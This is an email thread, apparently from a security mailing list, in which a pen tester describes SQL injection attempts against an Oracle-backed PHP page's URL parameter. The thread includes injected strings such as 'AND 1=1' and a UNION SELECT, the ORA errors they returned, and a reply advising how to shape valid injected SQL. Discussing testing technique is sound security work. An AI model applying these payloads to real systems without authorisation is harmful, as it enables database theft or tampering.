Re: Oracle URL SQL Injection issue

[Clone <c70n3 () yahoo co in>]

Well I already tried 

Id=90; select * from usr

I got following

OCIStmtExecute: ORA-00911: invalid character in
dbs.inc on line 44


BTW how serious is the issue? Can an attacker delete
or modify database using the current issue?

--- Joe Yong <justasqlguy () gmail com> wrote:

> It just looks like your query is invalid.
>
> While SQL injection is easier to perform than trying
> to bring some
> strong encryption, it still requires that your SQL
> is well formed.
>
> In your case, your input string probably does
> something along the
> lines of SELECT col1, col2, FROM Tbl_Foo WHERE
> item_id=:cItemID
>
> AND 1=1 is the most commonly cited example for SQL
> Injection because
> it will work in almost any situation including the
> above. However, it
> doesn't really get you anywhere interesting, takes a
> little more than
> that to have fun. Unfortunately, lots of people who
> write or talk
> about SQL Injection neglect to mention that you
> really do need to know
> what you're writing (just like script kiddies).
>
> Your statement, SELECT * FROM usr probably returns a
> lot more columns
> than your first query so the UNION will fail.
> Nothing wrong with the
> vulnerability. Just regular SQL syntax error. :-)
> Try something like
>
> ; SELECT * FROM usr
>
> Bottom line is, you gotta have well formed SQL.
>
>
> joe.
>
>
> On 1/17/08, Clone <c70n3 () yahoo co in> wrote:
> > Hey List
> >
> > I am pen testing a web app that supplies sql
> > parameters on the URL something like
> >
> > http://x.y.z.a/item.php?Id=90
> >
> > I did blind sql injection by adding AND 1=1 to
> confirm
> > the vulnerability.
> >
> > Now when I do
> >
> > http://x.y.z.a/item.php?Id=90&apos;
> >
> > I get
> >
> > ociparse() [function.ociparse]: OCIParse:
> ORA-01756:
> > quoted string not properly terminated in item.php
> on
> > line 312
> >
> > Then I tried (after confirming presence of usr
> table
> > name)
http://x.y.z.a/item.php?Id=90%20UNION%20SELECT%20*%20from%20usr;--
> > and I get the error
> >
> > ociexecute() [function.ociexecute]:
> OCIStmtExecute:
> > ORA-01789: query block has incorrect number of
> result
> > columns in dbs.inc on line 44
> >
> > I know one valid user account in the oracle DB.
> >
> > Any idea what's the best strategy to move forward?
> >
> > I'm not getting any further from here so far.
> >
> > Any advise / helpo would be much appreciated.
> >
> > Cheers'
> >
> >
> >
> >      5, 50, 500, 5000 - Store N number of mails in
> your inbox. Go to
http://help.yahoo.com/l/in/yahoo/mail/yahoomail/tools/tools-08.html
> >
------------------------------------------------------------------------
> > This list is sponsored by: Cenzic
> >
> > Need to secure your web apps NOW?
> > Cenzic finds more, "real" vulnerabilities fast.
> > Click to try it, buy it or download a solution
> FREE today!
> > http://www.cenzic.com/downloads
------------------------------------------------------------------------
> >



      Bring your gang together - do your thing. Go to http://in.promos.yahoo.com/groups


------------------------------------------------------------------------
This list is sponsored by: Cenzic

Need to secure your web apps NOW?
Cenzic finds more, "real" vulnerabilities fast.
Click to try it, buy it or download a solution FREE today!

http://www.cenzic.com/downloads
------------------------------------------------------------------------